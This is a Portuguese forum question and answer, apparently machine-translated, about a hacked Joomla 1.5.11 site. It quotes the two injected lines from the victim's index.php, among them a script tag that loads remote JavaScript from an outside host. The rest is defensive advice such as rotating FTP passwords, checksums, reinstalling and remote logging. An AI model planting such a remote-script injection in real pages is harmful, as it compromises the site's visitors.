Este é um ataque comum usando credenciais de FTP roubadas. Portanto, mesmo que sua instalação do Joomla seja segura, você precisa usar boas senhas.
A primeira coisa a fazer agora é alterar suas senhas o mais cedo possível.
Detalhes deste malware:
Recentemente, meu site foi atacado por um malware. Converte minha página de índice em branco. O ataque adiciona 2 linhas ao meu index.php:
<script type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Data_Type.js"></script>
<!--6aa6b5f1b4e70b5a72df7793c2b6e64b-->
Estou usando o joomla 1.5.11 com esse servidor considerado seguro. Como isso acontece e como evitá-lo para o futuro.
1) atualizações mais recentes.
2) rode o IDS e mantenha as somas de verificação dos arquivos que não deveriam estar mudando.
3) considere colocar em um sistema para arquivos de versão que não deveriam estar mudando.
4) não execute software que não seja necessário.
5) isole processos e serviços tanto quanto possível e execute com privilégios reduzidos para o nível mais baixo possível.
6) inscreva-se em listas de discussão de segurança e de usuário para o software que você usa, como grupos Joomla e software que você está usando para seus servidores.
7) backup de backup de backup
8) formate e reinstale seu servidor a partir de uma fonte em bom estado. Você não sabe até onde vai o compromisso ou quais rootkits ou outros problemas foram introduzidos.
9) instale o software de monitoramento em sistemas para seus switches, roteadores, firewall ... conheça os padrões de tráfego "normais" de anomalias e, em seguida, investigue quando algo começa a parecer estranho.
10) fique familiarizado com os servidores e o fluxo de trabalho da sua empresa. Familiar o suficiente para que você possa apenas "sentir" quando algo não está certo com os servidores. Investigar. Verifique os registros.
11) configure o log remoto para um servidor seguro. Sistemas comprometidos cobrem facilmente seus rastros quando os registros são locais.
12) pegue alguns livros sobre segurança do sistema ou delegue alguém para ser responsável por atualizações, problemas de segurança, etc.
13) isolar os sistemas voltados para a Internet de seus sistemas internos de desenvolvimento, backup, etc. Os backups não são bons se os seus sistemas internos forem monitorados por madeireiros e farejadores.
14) continue pesquisando a segurança do servidor com livros e artigos on-line, já que esse site não pode abranger tudo o que você precisa saber se quiser proteger sua empresa (e seus clientes) em um tópico como esse.
Essa exploração geralmente ocorre por meio de um nome de usuário / senha do ftp vazado
Tags security php apache-2.2